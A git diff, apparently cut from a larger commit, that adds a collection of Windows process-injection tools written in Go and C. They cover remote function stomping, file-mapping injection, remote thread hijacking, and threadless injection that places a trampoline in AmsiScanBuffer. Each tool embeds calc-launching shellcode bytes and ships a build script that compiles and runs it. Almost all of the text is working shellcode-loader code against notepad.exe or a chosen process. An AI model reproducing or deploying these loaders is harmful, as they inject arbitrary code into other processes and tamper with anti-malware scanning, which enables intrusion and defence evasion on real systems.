mode 100644 index 0000000..a7aa227 --- /dev/null +++ b/Registry_Shellcode/build.bat @@ -0,0 +1,4 @@ +@echo off +go build -o RegSC.exe +./RegSC.exe +exit \ No newline at end of file diff --git a/Remote_Function_Stomping_Injection/RemoteFuncMapper.c b/Remote_Function_Stomping_Injection/RemoteFuncMapper.c new file mode 100644 index 0000000..772b7c5 --- /dev/null +++ b/Remote_Function_Stomping_Injection/RemoteFuncMapper.c @@ -0,0 +1,51 @@ +// RemoteFuncMapper.c +#include "RemoteFuncMapper.h" +#include +#include +#include + +HANDLE find_process(const char* name) { + HANDLE hProcessSnap; + PROCESSENTRY32 pe32; + HANDLE hProcess = NULL; + + hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); + if (hProcessSnap == INVALID_HANDLE_VALUE) { + return NULL; + } + + pe32.dwSize = sizeof(PROCESSENTRY32); + + if (!Process32First(hProcessSnap, &pe32)) { + CloseHandle(hProcessSnap); + return NULL; + } + + do { + if (strcmp(pe32.szExeFile, name) == 0) { + hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID); + break; + } + } while (Process32Next(hProcessSnap, &pe32)); + + CloseHandle(hProcessSnap); + return hProcess; +} + +void inject_shellcode(HANDLE hprocess, unsigned char* shellcode, size_t size) { + LPVOID pRemoteCode; + DWORD oldProtect; + HANDLE hThread; + pRemoteCode = VirtualAllocEx(hprocess, NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); + if (pRemoteCode == NULL) { + return; + } + WriteProcessMemory(hprocess, pRemoteCode, shellcode, size, NULL); + VirtualProtectEx(hprocess, pRemoteCode, size, PAGE_EXECUTE_READ, &oldProtect); + hThread = CreateRemoteThread(hprocess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteCode, NULL, 0, NULL); + if (hThread != NULL) { + WaitForSingleObject(hThread, INFINITE); + CloseHandle(hThread); + } + VirtualFreeEx(hprocess, pRemoteCode, 0, MEM_RELEASE); +} diff --git a/Remote_Function_Stomping_Injection/RemoteFuncMapper.h b/Remote_Function_Stomping_Injection/RemoteFuncMapper.h new file mode 100644 index 0000000..41a3ab7 --- /dev/null +++ b/Remote_Function_Stomping_Injection/RemoteFuncMapper.h @@ -0,0 +1,18 @@ +// RemoteFuncMapper.h +#ifndef REMOTE_FUNC_MAPPER_H +#define REMOTE_FUNC_MAPPER_H + +#include + +#ifdef __cplusplus +extern "C" { +#endif + +HANDLE find_process(const char* name); +void inject_shellcode(HANDLE hprocess, unsigned char* shellcode, size_t size); + +#ifdef __cplusplus +} +#endif + +#endif // REMOTE_FUNC_MAPPER_H diff --git a/Remote_Function_Stomping_Injection/Remote_Function_Stomping_Injection.go b/Remote_Function_Stomping_Injection/Remote_Function_Stomping_Injection.go new file mode 100644 index 0000000..2b616b8 --- /dev/null +++ b/Remote_Function_Stomping_Injection/Remote_Function_Stomping_Injection.go @@ -0,0 +1,50 @@ +package main + +/* +#cgo CFLAGS: -I. +#cgo LDFLAGS: -lkernel32 -luser32 +#include "RemoteFuncMapper.h" +*/ +import "C" +import ( + "fmt" + "unsafe" +) + +func findProcess(name string) (C.HANDLE, error) { + cName := C.CString(name) // Convert Go string to C string and after we Free the C string after use :cool: + defer C.free(unsafe.Pointer(cName)) + handle := C.find_process(cName) + if handle == nil { + return nil, fmt.Errorf("process not found") + } + return handle, nil +} + +func injectShellcode(hProcess C.HANDLE, shellcode []byte) { + size := C.size_t(len(shellcode)) + shellcodePtr := unsafe.Pointer(&shellcode[0]) + C.inject_shellcode(hProcess, (*C.uchar)(shellcodePtr), size) +} + +func main() { + // start calc.exe + shellcode := []byte{ + 0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, + 0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76, + 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, + 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17, + 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, + 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, + 0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3, + } + + processName := "notepad.exe" + hProcess, err := findProcess(processName) + if err != nil { + fmt.Println("Error:", err) + return + } + + injectShellcode(hProcess, shellcode) +} diff --git a/Remote_Function_Stomping_Injection/build.bat b/Remote_Function_Stomping_Injection/build.bat new file mode 100644 index 0000000..743d939 --- /dev/null +++ b/Remote_Function_Stomping_Injection/build.bat @@ -0,0 +1,4 @@ +@Echo off +go build -o Remote_Function_Stomping_Injection.exe +./Remote_Function_Stomping_Injection.exe +exit \ No newline at end of file diff --git a/Remote_Mapping_Injection/Remote_Mapper.c b/Remote_Mapping_Injection/Remote_Mapper.c new file mode 100644 index 0000000..0319b21 --- /dev/null +++ b/Remote_Mapping_Injection/Remote_Mapper.c @@ -0,0 +1,112 @@ +#include +#include +#include + +DWORD FindProc(const char* process_name) { + HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); + if (snapshot == INVALID_HANDLE_VALUE) { + printf("[-] Failed to create snapshot. Error: %lu\n", GetLastError()); + return 0; + } + + PROCESSENTRY32 process_entry; + process_entry.dwSize = sizeof(PROCESSENTRY32); + + if (!Process32First(snapshot, &process_entry)) { + printf("[-] Failed to retrieve process information. Error: %lu\n", GetLastError()); + CloseHandle(snapshot); + return 0; + } + + DWORD pid = 0; + do { + if (strcmp(process_entry.szExeFile, process_name) == 0) { + pid = process_entry.th32ProcessID; + printf("[+] Found process '%s' with PID %lu\n", process_name, pid); + break; + } + } while (Process32Next(snapshot, &process_entry)); + + CloseHandle(snapshot); + if (pid == 0) { + printf("[-] Process '%s' not found.\n", process_name); + } + return pid; +} + +void execSC(const unsigned char* shellcode, size_t shellcode_size, const char* process_name) { + DWORD pid = FindProc(process_name); + if (pid == 0) { + printf("[-] Error finding the PID of the mentioned process!\n"); + return; + } + + HANDLE hprocess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); + if (hprocess == NULL) { + printf("[-] OpenProcess failed with error %lu\n", GetLastError()); + return; + } + printf("[+] Successfully opened process with PID %lu\n", pid); + + HANDLE hfile = CreateFileMappingA( + INVALID_HANDLE_VALUE, + NULL, + PAGE_EXECUTE_READWRITE, + 0, + (DWORD)shellcode_size, + NULL + ); + + if (hfile == NULL) { + printf("[-] CreateFileMappingA failed with error %lu\n", GetLastError()); + CloseHandle(hprocess); + return; + } + printf("[+] Successfully created file mapping.\n"); + + void* map_address = MapViewOfFile( + hfile, + FILE_MAP_WRITE | FILE_MAP_EXECUTE, + 0, + 0, + shellcode_size + ); + + if (map_address == NULL) { + printf("[-] MapViewOfFile failed with error %lu\n", GetLastError()); + CloseHandle(hfile); + CloseHandle(hprocess); + return; + } + printf("[+] Successfully mapped view of file.\n"); + + memcpy(map_address, shellcode, shellcode_size); + printf("[+] Successfully copied shellcode to the mapped memory.\n"); + + HANDLE hthread = CreateRemoteThread( + hprocess, + NULL, + 0, + (LPTHREAD_START_ROUTINE)map_address, + NULL, + 0, + NULL + ); + + if (hthread == NULL) { + printf("[-] CreateRemoteThread failed with error %lu\n", GetLastError()); + } else { + printf("[+] Successfully created remote thread. Waiting for it to finish...\n"); + WaitForSingleObject(hthread, INFINITE); + CloseHandle(hthread); + printf("[+] Remote thread completed.\n"); + } + + UnmapViewOfFile(map_address); + printf("[+] Unmapped view of file.\n"); + CloseHandle(hfile); + printf("[+] Closed file mapping handle.\n"); + CloseHandle(hprocess); + printf("[+] Closed process handle.\n"); + printf("[+] Shellcode Injected.\n"); +} diff --git a/Remote_Mapping_Injection/Remote_Mapping_Injection.go b/Remote_Mapping_Injection/Remote_Mapping_Injection.go new file mode 100644 index 0000000..06f1746 --- /dev/null +++ b/Remote_Mapping_Injection/Remote_Mapping_Injection.go @@ -0,0 +1,33 @@ +// Remote_Mapping_Injection.go + +package main + +/* +#cgo LDFLAGS: -lpsapi +#include +#include "Remote_Mapper.c" + +void execSC(const unsigned char* shellcode, size_t shellcode_size, const char* process_name); +*/ +import "C" + +func main() { + // start calc.exe + shellcode := []byte{ + 0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, + 0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76, + 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, + 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17, + 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, + 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, + 0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3, + } + + ProcName := "notepad.exe" + + C.execSC( + (*C.uchar)(&shellcode[0]), + C.size_t(len(shellcode)), + C.CString(ProcName), + ) +} \ No newline at end of file diff --git a/Remote_Thread_Hijacking/Remote_Thread_Hijacking.go b/Remote_Thread_Hijacking/Remote_Thread_Hijacking.go new file mode 100644 index 0000000..6e84460 --- /dev/null +++ b/Remote_Thread_Hijacking/Remote_Thread_Hijacking.go @@ -0,0 +1,91 @@ +package main + +/* +#cgo LDFLAGS: -luser32 -lkernel32 +#include "remote_thread_hijacking.c" +#include +#include +*/ +import "C" +import ( + "fmt" + "log" + "unsafe" +) + +const ( + PAGE_EXECUTE_READWRITE = 0x40 + MEM_COMMIT = 0x00001000 + MEM_RESERVE = 0x00002000 + THREAD_ALL_ACCESS = 0x001F03FF + INFINITE = 0xFFFFFFFF + CONTEXT_FULL = 0x00010000 +) + + +var shellcode = []byte{ + 0x50, 0x51, 0x52, 0x53, 0x56, 0x57, 0x55, 0x6A, 0x60, 0x5A, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, + 0x59, 0x48, 0x83, 0xEC, 0x28, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, 0x48, 0x8B, 0x76, + 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, 0x8B, 0x5C, 0x17, + 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, 0xB7, 0x2C, 0x17, + 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, 0x8B, 0x74, 0x1F, + 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, 0x48, 0x83, 0xC4, + 0x30, 0x5D, 0x5F, 0x5E, 0x5B, 0x5A, 0x59, 0x58, 0xC3, +} + + +func main() { + name := "notepad.exe" + cName := C.CString(name) + defer C.free(unsafe.Pointer(cName)) + + processHandle := C.find_process(cName) + if processHandle == nil { + log.Fatalf("Error finding process handle") + } + defer C.CloseHandle(processHandle) + + pid := C.GetProcessId(processHandle) + + threadHandle := C.find_thread(pid) + if threadHandle == nil { + log.Fatalf("Error finding thread handle") + } + defer C.CloseHandle(threadHandle) + + size := len(shellcode) + address := C.virtual_alloc_ex(processHandle, C.SIZE_T(size)) + if address == nil { + log.Fatalf("VirtualAllocEx failed") + } + + if success := C.write_process_memory(processHandle, address, unsafe.Pointer(&shellcode[0]), C.SIZE_T(size)); success == 0 { + log.Fatalf("WriteProcessMemory failed") + } + + var oldProtect C.DWORD + if success := C.virtual_protect_ex(processHandle, address, C.SIZE_T(size), C.DWORD(PAGE_EXECUTE_READWRITE), &oldProtect); success == 0 { + log.Fatalf("VirtualProtectEx failed") + } + + var ctx C.CONTEXT + ctx.ContextFlags = C.DWORD(C.CONTEXT_FULL) + if success := C.get_thread_context(threadHandle, &ctx); success == 0 { + log.Fatalf("GetThreadContext failed") + } + + // Convert addr to uintptr then to C.ULONG_PTR + ctx.Rip = C.ULONG_PTR(uintptr(address)) + + if success := C.set_thread_context(threadHandle, &ctx); success == 0 { + log.Fatalf("SetThreadContext failed") + } + + if success := C.resume_thread(threadHandle); success == C.DWORD(0xFFFFFFFF) { + log.Fatalf("ResumeThread failed") + } + + C.wait_for_single_object(threadHandle, C.INFINITE) + + fmt.Println("Thread executed!") +} \ No newline at end of file diff --git a/Remote_Thread_Hijacking/remote_thread_hijacking.c b/Remote_Thread_Hijacking/remote_thread_hijacking.c new file mode 100644 index 0000000..97b569d --- /dev/null +++ b/Remote_Thread_Hijacking/remote_thread_hijacking.c @@ -0,0 +1,90 @@ +#include +#include +#include +#include +#include + +// Function to convert a narrow string to a wide string +wchar_t* to_wide_string(const char* str) { + size_t len = mbstowcs(NULL, str, 0); + wchar_t* wide_str = (wchar_t*)malloc((len + 1) * sizeof(wchar_t)); + mbstowcs(wide_str, str, len + 1); + return wide_str; +} + +HANDLE find_process(const char* name) { + HANDLE snapshot; + PROCESSENTRY32 entry; + snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); + if (snapshot == INVALID_HANDLE_VALUE) return NULL; + + entry.dwSize = sizeof(PROCESSENTRY32); + if (Process32First(snapshot, &entry)) { + wchar_t* wide_name = to_wide_string(name); + do { + // Convert entry.szExeFile to wide string + wchar_t szExeFileWide[MAX_PATH]; + mbstowcs(szExeFileWide, entry.szExeFile, MAX_PATH); + if (wcscmp(szExeFileWide, wide_name) == 0) { + HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, entry.th32ProcessID); + free(wide_name); + CloseHandle(snapshot); + return process; + } + } while (Process32Next(snapshot, &entry)); + free(wide_name); + } + + CloseHandle(snapshot); + return NULL; +} + +HANDLE find_thread(DWORD pid) { + HANDLE snapshot; + THREADENTRY32 entry; + snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0); + if (snapshot == INVALID_HANDLE_VALUE) return NULL; + + entry.dwSize = sizeof(THREADENTRY32); + if (Thread32First(snapshot, &entry)) { + do { + if (entry.th32OwnerProcessID == pid) { + HANDLE thread = OpenThread(THREAD_ALL_ACCESS, FALSE, entry.th32ThreadID); + CloseHandle(snapshot); + return thread; + } + } while (Thread32Next(snapshot, &entry)); + } + + CloseHandle(snapshot); + return NULL; +} + +void* virtual_alloc_ex(HANDLE process, SIZE_T size) { + return VirtualAllocEx(process, NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); +} + +BOOL write_process_memory(HANDLE process, void* address, const void* data, SIZE_T size) { + SIZE_T bytes_written; + return WriteProcessMemory(process, address, data, size, &bytes_written) && bytes_written == size; +} + +BOOL virtual_protect_ex(HANDLE process, void* address, SIZE_T size, DWORD new_protect, DWORD* old_protect) { + return VirtualProtectEx(process, address, size, new_protect, old_protect); +} + +BOOL get_thread_context(HANDLE thread, CONTEXT* ctx) { + return GetThreadContext(thread, ctx); +} + +BOOL set_thread_context(HANDLE thread, const CONTEXT* ctx) { + return SetThreadContext(thread, ctx); +} + +DWORD resume_thread(HANDLE thread) { + return ResumeThread(thread); +} + +DWORD wait_for_single_object(HANDLE handle, DWORD timeout) { + return WaitForSingleObject(handle, timeout); +} diff --git a/Threadless_Injection/Threadless_Injection.go b/Threadless_Injection/Threadless_Injection.go new file mode 100644 index 0000000..9116102 --- /dev/null +++ b/Threadless_Injection/Threadless_Injection.go @@ -0,0 +1,68 @@ +package main + +/* +#cgo LDFLAGS: -L. -lthreadless_injection_wrapper +#include +*/ +import "C" +import ( + "fmt" + "os" + "unsafe" +) + +func main() { + if len(os.Args) < 2 { + fmt.Println("Usage: ") + return + } + + procname := os.Args[1] + cprocname := C.CString(procname) + defer C.free(unsafe.Pointer(cprocname)) + + pid := C.find_process(cprocname) + if pid == 0 { + fmt.Println("[!] Failed to find the PID of the target process") + return + } + + fmt.Printf("[+] Process ID: %d\n", pid) + + hModule := C.LoadLibraryA(C.CString("amsi.dll")) + if hModule == nil { + fmt.Printf("[!] LoadLibrary Failed With Status %d\n", C.GetLastError()) + return + } + + address := C.GetProcAddress(hModule, C.CString("AmsiScanBuffer")) + if address == nil { + fmt.Printf("[!] GetProcAddress Failed With Status %d\n", C.GetLastError()) + return + } + + hProcess := C.OpenProcess(C.PROCESS_ALL_ACCESS, C.FALSE, pid) + if hProcess == nil { + fmt.Printf("[!] OpenProcess Failed With Status %d\n", C.GetLastError()) + return + } + + addressPtr := unsafe.Pointer(address) + + fmt.Printf("[+] Function: AmsiScanBuffer | Address: %p\n", addressPtr) + + fmt.Println("[+] Looking for a memory hole") + addressRole := C.find_memory_role(C.SIZE_T(uintptr(addressPtr)), hProcess) + if addressRole == nil { + fmt.Println("[!] find_memory_role Failed With Status") + return + } + + fmt.Println("[+] Writing the shellcode") + C.write_shellcode(hProcess, addressRole) + + fmt.Println("[+] Installing the trampoline") + C.install_trampoline(hProcess, addressRole, addressPtr) + + fmt.Println("[+] Finished Sucessfully") +} diff --git a/Threadless_Injection/build.bat b/Threadless_Injection/build.bat new file mode 100644 index 0000000..f268769 --- /dev/null +++ b/Threadless_Injection/build.bat @@ -0,0 +1,5 @@ +@ECho off +gcc -shared -o threadless_injection_wrapper.dll threadless_injection_wrapper.c +dlltool --dllname threadless_injection_wrapper.dll --input-def threadless_injection_wrapper.def --output-lib threadless_injection_wrapper.lib +go build -o ThreadlessInject.exe +exit \ No newline at end of file diff --git a/Threadless_Injection/threadless_injection_wrapper.c b/Threadless_Injection/threadless_injection_wrapper.c new file mode 100644 index 0000000..26ba720 --- /dev/null +++ b/Threadless_Injection/threadless_injection_wrapper.c @@ -0,0 +1,136 @@ +#include +#include +#include +#include +#include +// Shellcode and Patch Shellcode +const uint8_t PATCH_SHELLCODE[55] = { + 0x58, 0x48, 0x83, 0xE8, 0x05, 0x50, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51, 0x41, 0x52, 0x41, 0x53, + 0x48, 0xB9, 0xBB, 0xBB, 0xBB, 0xBB, 0xBB, 0xBB, 0xBB, 0xBB, 0x48, 0x89, 0x08, 0x48, 0x83, 0xEC, + 0x40, 0xE8, 0x11, 0x00, 0x00, 0x00, 0x48, 0x83, 0xC4, 0x40, 0x41, 0x5B, 0x41, 0x5A, 0x41, 0x59, + 0x41, 0x58, 0x5A, 0x59, 0x58, 0xFF, 0xE0, +}; +// start calc.exe +const uint8_t SHELLCODE[106] = { + 0x53, 0x56, 0x57, 0x55, 0x54, 0x58, 0x66, 0x83, 0xE4, 0xF0, 0x50, 0x6A, 0x60, 0x5A, 0x68, 0x63, + 0x61, 0x6C, 0x63, 0x54, 0x59, 0x48, 0x29, 0xD4, 0x65, 0x48, 0x8B, 0x32, 0x48, 0x8B, 0x76, 0x18, + 0x48, 0x8B, 0x76, 0x10, 0x48, 0xAD, 0x48, 0x8B, 0x30, 0x48, 0x8B, 0x7E, 0x30, 0x03, 0x57, 0x3C, + 0x8B, 0x5C, 0x17, 0x28, 0x8B, 0x74, 0x1F, 0x20, 0x48, 0x01, 0xFE, 0x8B, 0x54, 0x1F, 0x24, 0x0F, + 0xB7, 0x2C, 0x17, 0x8D, 0x52, 0x02, 0xAD, 0x81, 0x3C, 0x07, 0x57, 0x69, 0x6E, 0x45, 0x75, 0xEF, + 0x8B, 0x74, 0x1F, 0x1C, 0x48, 0x01, 0xFE, 0x8B, 0x34, 0xAE, 0x48, 0x01, 0xF7, 0x99, 0xFF, 0xD7, + 0x48, 0x83, 0xC4, 0x68, 0x5C, 0x5D, 0x5F, 0x5E, 0x5B, 0xC3, +}; + +__declspec(dllexport) DWORD find_process(const char* process_name); +__declspec(dllexport) void write_shellcode(HANDLE h_process, void* address); +__declspec(dllexport) void install_trampoline(HANDLE h_process, void* address, void* function_address); +__declspec(dllexport) void* find_memory_role(SIZE_T func_address, HANDLE h_process); + +__declspec(dllexport) DWORD find_process(const char* process_name) { + HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0); + if (snapshot == INVALID_HANDLE_VALUE) { + return 0; + } + + PROCESSENTRY32 process_entry = { 0 }; + process_entry.dwSize = sizeof(PROCESSENTRY32); + + if (!Process32First(snapshot, &process_entry)) { + CloseHandle(snapshot); + return 0; + } + + DWORD pid = 0; + do { + if (strcmp(process_entry.szExeFile, process_name) == 0) { + pid = process_entry.th32ProcessID; + break; + } + } while (Process32Next(snapshot, &process_entry)); + + CloseHandle(snapshot); + return pid; +} + +__declspec(dllexport) void* find_memory_role(SIZE_T func_address, HANDLE h_process) { + SIZE_T address = (func_address & 0xFFFFFFFFFFF70000) - 0x70000000; + while (address < func_address + 0x70000000) { + void* tmp_address = VirtualAllocEx( + h_process, + (LPVOID)address, + sizeof(SHELLCODE) + sizeof(PATCH_SHELLCODE), + MEM_COMMIT | MEM_RESERVE, + PAGE_READWRITE + ); + + if (tmp_address) { + printf("[+] Allocated at: %p\n", tmp_address); + return tmp_address; + } + + address += 0x10000; + } + + return NULL; +} + +__declspec(dllexport) void write_shellcode(HANDLE h_process, void* address) { + SIZE_T number_of_write = 0; + WriteProcessMemory( + h_process, + address, + PATCH_SHELLCODE, + sizeof(PATCH_SHELLCODE), + &number_of_write + ); + + SIZE_T shellcode_address = (SIZE_T)address + sizeof(PATCH_SHELLCODE); + WriteProcessMemory( + h_process, + (LPVOID)shellcode_address, + SHELLCODE, + sizeof(SHELLCODE), + &number_of_write + ); + + DWORD old_protect; + VirtualProtectEx( + h_process, + address, + sizeof(SHELLCODE), + PAGE_EXECUTE_READWRITE, + &old_protect + ); +} + +__declspec(dllexport) void install_trampoline(HANDLE h_process, void* address, void* function_address) { + uint8_t trampoline[5] = {0xE8, 0x00, 0x00, 0x00, 0x00}; + DWORD rva = (DWORD)((SIZE_T)address - ((SIZE_T)function_address + sizeof(trampoline))); + memcpy(trampoline + 1, &rva, sizeof(rva)); + + DWORD old_protect; + VirtualProtectEx( + h_process, + function_address, + sizeof(trampoline), + PAGE_READWRITE, + &old_protect + ); + + SIZE_T number_bytes_written; + WriteProcessMemory( + h_process, + function_address, + trampoline, + sizeof(trampoline), + &number_bytes_written + ); + + VirtualProtectEx( + h_process, + function_address, + sizeof(trampoline), + PAGE_EXECUTE_READWRITE, + &old_protect + ); +} diff --git a/Threadless_Injection/threadless_injection_wrapper.def b/Threadless_Injection/threadless_injection_wrapper.def new file mode 100644 index 0000000..4b15190 --- /dev/null +++ b/Threadless_Injection/threadless_injection_wrapper.def @@ -0,0 +1,5 @@ +EXPORTS +find_process +write_shellcode +install_trampoline +find_memory_role diff --git a/Threadless_Injection/threadless_injection_wrapper.h b/Threadless_Injection/threadless_injection_wrapper.h new file mode 100644 index 0000000..c79f03d --- /dev/null +++ b/Threadless_Injection/threadless_injection_wrapper.h @@ -0,0 +1,22 @@ +// threadless_injection_wrapper.h + +#ifndef THREADLESS_INJECTION_WRAPPER_H +#define THREADLESS_INJECTION_WRAPPER_H + +#include +#include + +#ifdef __cplusplus +extern "C" { +#endif + +__declspec(dllexport) DWORD find_process(const char* process_name); +__declspec(dllexport) void write_shellcode(HANDLE h_process, void* address); +__declspec(dllexport) void install_trampoline(HANDLE h_process, void* address, void* function_address); +__declspec(dllexport) void* find_memory_role(SIZE_T func_address, HANDLE h_process); + +#ifdef __cplusplus +} +#endif + +#endif // THREADLESS_INJECTION_WRAPPER_H